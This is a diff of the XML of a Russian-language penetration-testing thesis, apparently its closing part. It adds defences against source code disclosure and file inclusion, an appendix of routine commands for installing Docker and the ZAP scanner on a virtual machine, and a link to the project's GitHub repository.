+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пользование относительных путей;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="851" w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>о</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>граничение доступ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>а к файлам;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="851" w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ф</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ильтрация и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>валидация</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> пользовательского ввода</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Применение этих методов защиты поможет снизить риск успешных атак </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Source</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Code</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Disclosure</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Inclusion</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и обеспечит безопасность вашего приложения и сервера.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
@@ -21638,7 +22753,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc158883779"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc158883779"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21646,18 +22761,621 @@
         <w:lastRenderedPageBreak/>
         <w:t>Приложение</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Основные команды для настройки виртуальной машины</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get update</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get install apt-transport-https ca-certificates curl software-properties-common</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>curl -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>fsSL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> https://download.docker.com/linux/ubuntu/gpg | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-key add -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lsb_release</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) stable"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get update</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>docker-ce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>status</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>docker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Установка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ZAP </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>виртуальной машины</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>apt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>install</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>zaproxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ссылки на проект в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GitHub</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>файлы, код, отчеты)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId90" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ad"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:szCs w:val="28"/>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:t>https://github.com/vit81g/netology_ibb/tree/main/diplom/PenTest</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
